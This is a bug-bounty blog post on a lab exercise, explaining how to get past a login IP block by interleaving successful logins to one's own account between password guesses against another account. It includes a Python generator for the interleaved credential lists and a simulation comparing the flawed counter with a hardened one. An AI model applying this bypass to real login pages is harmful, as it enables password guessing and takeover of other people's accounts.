Bypass Brute-force IP Block

Aman Bhuiyan
2 min read · Aug 25, 2024

In bug bounty, we sometimes get stuck at the target's login page after submitting too many invalid usernames or passwords. Most of the time, the target website blocks our IP or shows a warning message such as:

“You have made too many incorrect login attempts. Please try again in 1 minute(s).”

This means that our IP has been blocked for 1 minute, and we can't make any more attempts during that period. The restriction is there to deny the opportunity for brute-force attacks. But we can bypass this restriction!

Let’s see:

  1. Observe that your IP is temporarily blocked if you submit 3 incorrect logins in a row. However, notice that you can reset the counter for the number of failed login attempts by logging in to your own account before this limit is reached.
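  2. So build a Python payload list in which the correct username and password of your own account are submitted after every two brute-force attempts.

```python
# For this logic, let's write a Python script.

# Username list: "wiener" (our own account) first, then "carlos" twice, repeated.
print("The Following are the usernames: #############")
for i in range(150):
    if i % 3:
        print("carlos")
    else:
        print("wiener")

# Password list: "peter" (our own password) lines up with every "wiener" entry,
# and two candidates from password.txt line up with the two "carlos" entries.
print("The following are the passwords: ##########")
with open('password.txt', 'r') as f:
    lines = f.readlines()

i = 0
for pwd in lines:
    if i % 3:
        print(pwd.strip('\n'))
    else:
        print("peter")
        print(pwd.strip('\n'))
        i = i + 1
    i = i + 1
```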

Note: Save all the passwords in a password.txt file.

The output looks like this:

4. Then we look for the 302 response (redirect to the home page) for username carlos.

For a practical demonstration, you can solve this lab:

Lab: Broken brute-force protection, IP block
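
Seen from the server side, the steps above work because the failure counter is kept per IP and cleared by any successful login. The following is an added example, not code from this post or from the lab: it replays the same login pattern against that flawed counter and against a hardened one. The class names, the IP address and the `LIMIT` constant are assumptions, and time-based expiry of the block is left out.

```python
from collections import defaultdict

LIMIT = 3  # failed logins in a row before blocking, as observed in step 1

class ResetOnAnySuccess:
    """Flawed: one counter per IP, cleared by a successful login to ANY account."""
    def __init__(self):
        self.fails = defaultdict(int)

    def attempt(self, ip, user, ok):
        if self.fails[ip] >= LIMIT:
            return "blocked"
        if ok:
            self.fails[ip] = 0          # the reset that step 1 relies on
            return "ok"
        self.fails[ip] += 1
        return "fail"

class PerAccountAware:
    """Hardened: success clears only that account's counter, never the IP counter."""
    def __init__(self):
        self.ip_fails = defaultdict(int)
        self.user_fails = defaultdict(int)

    def attempt(self, ip, user, ok):
        if self.ip_fails[ip] >= LIMIT or self.user_fails[user] >= LIMIT:
            return "blocked"
        if ok:
            self.user_fails[user] = 0   # IP counter is left untouched
            return "ok"
        self.ip_fails[ip] += 1
        self.user_fails[user] += 1
        return "fail"

def guesses_evaluated(limiter, total_guesses, ip="203.0.113.7"):
    """Replay the pattern from step 2 (constructed input): one valid login to the
    requester's own account, then two wrong guesses against another account."""
    evaluated = 0
    for n in range(total_guesses):
        if n % 2 == 0:
            limiter.attempt(ip, "wiener", ok=True)
        if limiter.attempt(ip, "carlos", ok=False) == "fail":
            evaluated += 1              # the server actually checked this guess
    return evaluated

if __name__ == "__main__":
    print("flawed counter:  ", guesses_evaluated(ResetOnAnySuccess(), 100))
    print("hardened counter:", guesses_evaluated(PerAccountAware(), 100))
```

The flawed counter checks every guess without ever blocking, while the hardened one stops after the third failure no matter how many valid logins are interleaved.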

#HappyHacking
